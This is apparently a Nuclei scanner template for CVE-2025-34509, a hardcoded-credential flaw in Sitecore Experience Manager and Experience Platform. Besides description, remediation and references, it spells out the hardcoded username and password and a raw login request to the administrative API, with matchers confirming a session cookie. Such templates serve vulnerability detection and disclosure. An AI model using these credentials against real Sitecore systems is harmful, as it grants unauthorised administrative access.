id: CVE-2025-34509

info:
  name: Sitecore Experience Manager (XM) and Experience Platform (XP) - Hardcoded Credentials
  author: daffainfo
  severity: high
  description: |
    Sitecore Experience Manager (XM) and Experience Platform (XP) versions 10.1 to 10.1.4 rev. 011974 PRE, all versions of 10.2, 10.3 to 10.3.3 rev. 011967 PRE, and 10.4 to 10.4.1 rev. 011941 PRE contain a hardcoded user account. Unauthenticated and remote attackers can use this account to access administrative API over HTTP.
  impact: |
    Unauthenticated attackers can use hardcoded credentials to access administrative API endpoints over HTTP, potentially compromising the entire Sitecore platform.
  remediation: |
    Apply the security patch as described in Sitecore KB1003667 and change all default credentials immediately.
  reference:
    - https://labs.watchtowr.com/is-b-for-backdoor-pre-auth-rce-chain-in-sitecore-experience-platform/
    - https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1003667
    - https://nvd.nist.gov/vuln/detail/CVE-2025-34509
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
    cvss-score: 8.2
    cve-id: CVE-2025-34509
    epss-score: 0.16874
    epss-percentile: 0.95123
    cwe-id: CWE-798
    cpe: cpe:2.3:a:sitecore:experience_commerce:*:*:*:*:*:*:*:*,cpe:2.3:a:sitecore:experience_platform:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: sitecore
    product: experience_commerce,experience_platform
    shodan-query: title:"sitecore"
  tags: cve,cve2025,sitecore,experience_commerce,experience_platform,vkev

http:
  - raw:
      - |
        POST /sitecore/api/ssc/auth/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"domain":"sitecore","username":"{{username}}","password":"{{password}}"}

    attack: pitchfork
    payloads:
      username:
        - ServicesAPI
      password:
        - b

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - 'Set-Cookie'
          - '.AspNet.Cookies='
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100c46e6f4d7e2e5aba7ef847b1f06030ae33de44db514d751a437a66be438c194c02200d6033078ec40459357d6065bfd3ec0c66a4255dd8062227b4af964bb912ae6a:922c64590222798bb761d5b6d8e72950